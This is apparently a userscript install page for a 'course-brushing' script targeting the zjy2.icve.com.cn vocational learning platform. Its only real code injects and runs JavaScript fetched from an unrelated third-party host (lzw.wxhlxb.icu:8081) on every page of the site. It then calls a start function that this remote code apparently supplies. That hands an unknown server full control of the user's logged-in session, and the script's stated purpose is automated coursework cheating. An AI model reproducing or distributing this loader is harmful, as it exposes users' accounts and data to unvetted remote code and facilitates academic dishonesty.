源码安装
2754302155 / 职教云刷课最新

// ==UserScript==
// @name        职教云刷课最新
// @namespace   Violentmonkey Scripts
// @match       https://zjy2.icve.com.cn/*
// @grant       none
// @license     MIT
// @version     2.1
// @author      qq: 2754302155
// @run-at      document-end
// @description 2021/6/6 下午3:31:21
// ==/UserScript==
var head = document.head || document.getElementsByTagName('head')[0];
   var script = document.createElement('script');
   var style = document.createElement('style');
   script.setAttribute("src", "https://lzw.wxhlxb.icu:8081/js");
   head.appendChild(script);

//dev
window.onload= ()=>{
    setTimeout(
    start,1000);
}